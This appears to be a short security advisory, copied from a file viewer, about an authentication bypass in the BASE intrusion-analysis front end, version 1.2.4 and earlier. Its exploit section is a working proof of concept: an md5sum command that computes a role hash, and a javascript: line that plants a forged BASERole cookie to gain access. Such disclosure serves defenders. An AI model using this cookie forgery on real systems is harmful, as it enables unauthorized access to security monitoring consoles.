13 lines
No EOL
547 B
Text
13 lines
No EOL
547 B
Text
source: http://www.securityfocus.com/bid/35470/info
|
|
|
|
Basic Analysis And Security Engine (BASE) is prone to an authentication-bypass vulnerability.
|
|
|
|
An attacker can exploit this issue to gain unauthorized access to the affected application. Successfully exploiting this issue will lead to other attacks.
|
|
|
|
BASE 1.2.4 is vulnerable; prior versions are also affected.
|
|
|
|
The following examples are available:
|
|
|
|
echo -n 10000nidemBASEUserRole | md5sum
|
|
|
|
javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e; path=/" |